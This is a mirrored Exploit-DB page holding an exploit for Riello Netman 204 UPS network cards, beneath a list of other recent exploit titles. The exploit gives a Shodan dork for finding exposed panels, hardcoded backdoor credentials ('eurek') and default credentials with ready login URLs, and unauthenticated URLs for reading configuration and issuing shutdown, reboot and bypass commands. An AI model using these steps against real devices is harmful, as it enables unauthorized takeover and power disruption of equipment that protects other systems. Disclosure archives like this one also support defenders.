bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/multiple/hardware/52183.txt
Exploit-DB b165516b1b DB: 2025-04-12 
26 changes to exploits/shellcodes/ghdb

ABB Cylon Aspect 3.08.02 - PHP Session Fixation
ABB Cylon FLXeon 9.3.4 - Cross-Site Request Forgery
ABB Cylon FLXeon 9.3.4 - Default Credentials
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (Authenticated)
ABB Cylon FLXeon 9.3.4 - Remote Code Execution (RCE)
ABB Cylon FLXeon 9.3.4 - System Logs Information Disclosure
ABB Cylon FLXeon 9.3.4 - WebSocket Command Spawning

Netman 204 - Remote command without authentication

qBittorrent 5.0.1 - MITM RCE

CMU CERT/CC VINCE 2.0.6 - Stored XSS

CyberPanel 2.3.6 - Remote Code Execution (RCE)
GeoVision GV-ASManager 6.1.0.0 - Broken Access Control
GeoVision GV-ASManager 6.1.1.0 - CSRF

MagnusSolution magnusbilling 7.3.0 - Command Injection

Nagios Log Server 2024R1.3.1 - API Key Exposure

WebFileSys 2.31.0 - Directory Path Traversal

flatCore 1.5 - Cross Site Request Forgery (CSRF)

GetSimpleCMS 3.3.16 - Remote Code Execution (RCE)

Gnuboard5 5.3.2.8 - SQL Injection

LearnPress WordPress LMS Plugin 4.2.7 - SQL Injection

MiniCMS 1.1 - Cross Site Scripting (XSS)

NEWS-BUZZ News Management System 1.0 - SQL Injection

phpIPAM 1.6 - Reflected Cross Site Scripting (XSS)

RosarioSIS 7.6 - SQL Injection

Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)
2025-04-12 00:16:31 +00:00

70 lines
No EOL
2.7 KiB
Text
Raw Permalink Blame History

# Exploit Title: Netman 204 - Remote command with out authentication
# Date: 2/4/2025
# Exploit Author: parsa rezaie khiabanloo
# Vendor Homepage: netman-204 (https://www.riello-ups.com/downloads/25-netman-204)
# Version: netman-204
# Tested on: Windows/Linux
Step 1 : Attacker can using these dorks then can find the UPS panel .
Shodan : http.favicon.hash:22913038 OR https://www.shodan.io/search?query=netman+204+cgi-bin
# We Found Two panel Yellow and blue
Step 2 : For Yellow panel attacker can use these username and password because there have backdoor and for Blue panel we can use the Remote commands and burpsuite repeater to see the details of the ups .
Yellow Panel : username and password : eurek
Some exploits for that :
http://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek&password=eurek
Due to flaws in parameter validation, the URL can be shortened to:
http://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
or
https://[IP]/cgi-bin/login.cgi?username=eurek%20eurek
Blue Panel : username and password : admin
Some Critical leaks without authentication we can see :
http://IP/administration-commands.html
http://IP/administration.html
http://IP/administration.html#
http://IP/administration.html#LDAP
http://IP/administration.html#active-users
http://IP/administration.html#firmware-upgrade
http://IP/configuration.html
http://IP/history.html
http://IP/index.html
http://IP/login.html
http://IP/system-overview.html
http://IP/table.html
#With using up paths we can see the details of the UPS without authentication .
First open burpsuite and intercept the requests then use the up paths and after that send that request to the repeater then send it again and in your response open the render and enjoy :)
Some Remote commands without authentication :
http://IP/administration-commands.html
http://IP/administration-commands.html#
http://IP/administration-commands.html#reboot-irms
http://IP/administration-commands.html#reboot-mdu
http://IP/administration-commands.html#reboot-xts
http://IP/administration-commands.html#shutdown
http://IP/administration-commands.html#shutdown-irms
http://IP/administration-commands.html#shutdown-mdu
http://IP/administration-commands.html#shutdown-restore
http://IP/administration-commands.html#shutdown-restore-irms
http://IP/administration-commands.html#shutdown-restore-mdu
http://IP/administration-commands.html#shutdown-restore-xts
http://IP/administration-commands.html#shutdown-xts
http://IP/administration-commands.html#shutdownrestore
http://IP/administration-commands.html#switch-irms
http://IP/administration-commands.html#switch-on-bypass
http://IP/administration-commands.html#test-battery
Reference in a new issue View git blame Copy permalink